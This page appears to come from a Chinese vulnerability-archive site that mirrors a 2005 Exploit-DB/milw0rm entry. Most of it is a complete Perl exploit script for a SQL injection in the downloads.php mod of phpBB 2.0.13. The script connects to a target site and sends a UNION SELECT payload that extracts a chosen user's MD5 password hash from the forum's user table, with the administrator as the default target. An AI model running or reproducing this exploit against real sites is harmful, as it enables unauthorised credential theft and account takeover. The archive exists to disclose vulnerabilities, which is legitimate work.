phpBB 2.0.13 – ‘downloads.php’ mod Get Hash

phpBB 2.0.13 – ‘downloads.php’ mod Get Hash

漏洞ID 1054990 漏洞类型
发布时间 2005-04-02 更新时间 2005-04-02
图片[1]-phpBB 2.0.13 – ‘downloads.php’ mod Get Hash-安全小百科CVE编号 N/A
图片[2]-phpBB 2.0.13 – ‘downloads.php’ mod Get Hash-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/907
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl -w
use IO::Socket;

##    Example:
##    C:>phpbb.pl www.site.com /phpBB2/ 2
##
##     downloads.php mod in phpBB <= 2.0.13
##     **********************************
##      [~] Connecting...
##      [+] Connected!
##      [~] Sending Data...
##      [~] Data Sent, Waiting for response...
##      [+] MD5 Hash for user with id=2 is: 81dc9bdb52d04dc20036dbd8313ed055
##
if (@ARGV < 3)
{
print "nn";
print "|****************************************************************|n";
print " phpBB <=2.0.13 'downloads.php' Modn";
print " Bug found by Axl And CereBrumsn";
print " Coded by CereBrums // 2/4/2005n";
print " Usage: phpbb.pl <site> <folder> <user_id>n";
print " e.g.: phpbb.pl www.site.com /phpBB2/ 2 n";
print " [~] <server> - site addressn";
print " [~] <folder> - forum foldern";
print " [~] <user_id> - user id (2 default for phpBB admin)n";
print "|****************************************************************|n";
print "nn";
exit(1);
}

$take = 0;
$success = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
print "n downloads.php mod in phpBB <= 2.0.13n";
print " **********************************n";
print "  [~] Connecting...n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";

print "  [+] Connectedn";
print "  [~] Sending Data...n";

$path = "http://$server/";
$path .= "/$folder/";
$path .= "downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0%20FROM%20phpbb_users%20WHERE%20user_id=$user_id/*";
print $socket "GET $path HTTP/1.0rnrn";

print "  [~] Data Sent, Waiting for response...n";

while ($answer = <$socket>)
{
       if ($take == 1) {
               $pass = substr($answer,51,32);
               print "  [+] MD5 Hash for user with id=$user_id is: $passn";
               $success = 1;
               $take = 0;
       }
       $found = rindex ($answer,"downloads.php?view=detail&id=0&cat=0");
       if ( $found > -1 ) {
               $take = 1;
       }
}
if ($success==0) {print "  [-] Exploit failedn";}

## EOF ##

# milw0rm.com [2005-04-02]

相关推荐: XFree86 Xserver Buffer Overflow Vulnerability

XFree86 Xserver Buffer Overflow Vulnerability 漏洞ID 1104274 漏洞类型 Boundary Condition Error 发布时间 2000-04-16 更新时间 2000-04-16 CVE编号 N/A…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享